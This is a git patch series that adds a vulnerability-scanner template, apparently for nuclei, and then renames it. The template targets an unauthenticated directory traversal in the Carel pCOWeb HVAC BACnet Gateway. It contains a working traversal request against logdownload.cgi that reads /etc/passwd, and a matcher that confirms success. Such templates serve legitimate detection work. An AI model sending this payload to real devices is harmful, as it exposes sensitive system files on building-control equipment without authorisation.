From 549c969d5f4ff5e1dc8384bd126cfadb08d70538 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim <gy741.kim@gmail.com>
Date: Sat, 16 Jul 2022 10:59:44 +0900
Subject: [PATCH 1/2] Create carel-bacnet-gateway-directory-traversal.yaml

The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
---
 ...el-bacnet-gateway-directory-traversal.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml

diff --git a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml b/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
new file mode 100644
index 0000000000..4a08a4ec45
--- /dev/null
+++ b/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
@@ -0,0 +1,20 @@
+id: carel-bacnet-gateway-directory-traversal
+
+info:
+  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
+  author: gy741
+  severity: medium
+  description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
+  reference:
+    - https://www.zeroscience.mk/codes/carelpco_dir.txt
+  tags: carel,lfi,traversal,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

From 1318dbbae86728cfd41a5eb573dc3f038abe443b Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 18 Jul 2022 13:47:02 +0530
Subject: [PATCH 2/2] Update and rename
 carel-bacnet-gateway-directory-traversal.yaml to
 carel-bacnet-gateway-traversal.yaml

---
 ...ory-traversal.yaml => carel-bacnet-gateway-traversal.yaml} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename vulnerabilities/other/{carel-bacnet-gateway-directory-traversal.yaml => carel-bacnet-gateway-traversal.yaml} (90%)

diff --git a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
similarity index 90%
rename from vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
rename to vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
index 4a08a4ec45..1b4037f347 100644
--- a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
+++ b/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
@@ -1,4 +1,4 @@
-id: carel-bacnet-gateway-directory-traversal
+id: carel-bacnet-gateway-traversal
 
 info:
   name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
@@ -7,7 +7,7 @@ info:
   description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
   reference:
     - https://www.zeroscience.mk/codes/carelpco_dir.txt
-  tags: carel,lfi,traversal,unauth
+  tags: carel,lfi,traversal,unauth,bacnet,unauth
 
 requests:
   - method: GET